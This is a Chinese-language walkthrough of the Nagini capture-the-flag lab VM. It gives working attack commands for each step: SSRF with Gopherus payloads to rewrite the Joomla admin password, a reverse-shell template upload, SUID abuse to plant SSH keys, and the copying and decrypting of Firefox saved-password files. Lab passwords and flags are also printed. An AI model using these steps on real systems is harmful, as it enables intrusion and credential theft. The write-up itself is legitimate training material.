Nagini 是 HarryPotter VM 系列的第二個 VM，您需要在其中找到隱藏在機器內的 3 個魂器（哈利波特系列的 3 個 VM 中總共隱藏了 8 個魂器）并最終擊敗 Voldemort。
?

?

信息收集

nmap掃描

nmap -sC -sV 192.168.210.229

網站信息收集

一張圖片啥也沒有

網站目錄爆破
gobuster dir -u [http://192.168.210.229](http://192.168.210.229) -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

掃出來了一個note.txt 一個joomla

先去看看joomla

網站cms為joomla 。joomscan跑下試試
joomscan --url 192.168.210.229/joomla

發現cms版本為Joomla 3.9.25
掃到一個備份的配置文件
http://192.168.210.229/joomla/configuration.php.bak

里面發現了數據庫信息 得到用戶goblin 密碼為空 但是只能本地登錄

再去看看note.txt

這里告訴我們要用http3訪問https://quic.nagini.hogwarts
http3環境不會搞。。。。搜索其他攻略發現存在internalResourceFeTcher.php字樣的提示
?

訪問http://192.168.210.229/internalResourceFeTcher.php

可以使用file方法查看文件

漏洞利用

獲取后臺用戶密碼

需要利用工具
Gopherus：https://github.com/tarunkant/Gopherus
上文步驟中已經知道數據庫名為joomla
查詢庫中的表名

?

?

?

在http://192.168.210.229/internalResourceFeTcher.php中填入連接 ，，如果沒出結果請刷新幾次

可知目標表名為joomla_users
繼續查詢

直接更新密碼
5f4dcc3b5aa765d61d8327deb882cf99 = password
USE joomla; UPDATE joomla_users SET password=‘5f4dcc3b5aa765d61d8327deb882cf99’ WHERE email=‘site_admin@nagini.hogwarts’;
?

getshell

登錄后臺

選擇組件

點擊 newfie 創建新文件

寫一個php反彈shell馬

訪問一下php頁面http://192.168.210.229/joomla/templates/protostar/muma.php
?

?

python調bash
python3 -c “import pty;pty.spawn(’/bin/bash’)”
?

在/var/www/html發現一個魂器

horcrux_{MzogU2x5dGhFcmlOJ3MgTG9jS0VldCBkRXN0cm9ZZUQgYlkgUm9O}

?

在hermoine用戶家目錄下發現第二個魂器，但是我們沒有權限查看

換snape用戶家目錄

發現隱藏文件.creds.txt
base64解碼得到一個密碼 Love@lilly

漏洞利用 -ssh免密登錄

切換至snape用戶

查看suid權限

su_cp有suid權限，
嘗試實施ssh免密登錄
把kali的ssh公鑰放進去

注意賦予640權限

?

?

/home/hermoine/bin/su_cp -p authorized_keys /home/hermoine/.ssh/

免密登錄成功，拿到第二個魂器

提權-firefox密碼泄露

在~/.mozilla/firefox/g2mhbq0o.default下發現火狐瀏覽器的記錄信息，里面可能會有記錄的用戶名密碼，但是直接打開看不了

python建立http服務
python3 -m http.server 8888

?

?

使用firewd工具（用于解密Mozilla受保護密碼的開源工具）
下載連接https://github.com/lclevy/firepwd
按安裝工具pip install -r requirements.txt

將兩個文件下載到本地
wget http://192.168.210.229:8888/key4.db
wget http://192.168.210.229:8888/logins.json
?

將腳本復制到與密碼文件一個目錄下
cp ~/tools/firepwd-master/firepwd.py ./
執行腳本
python3 firepwd.py
成功爆破出root @Alohomora#123

切換到root，成功拿到第三個魂器

?

?

總結

以上是生活随笔為你收集整理的HarryPotter第二部—Nagini的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。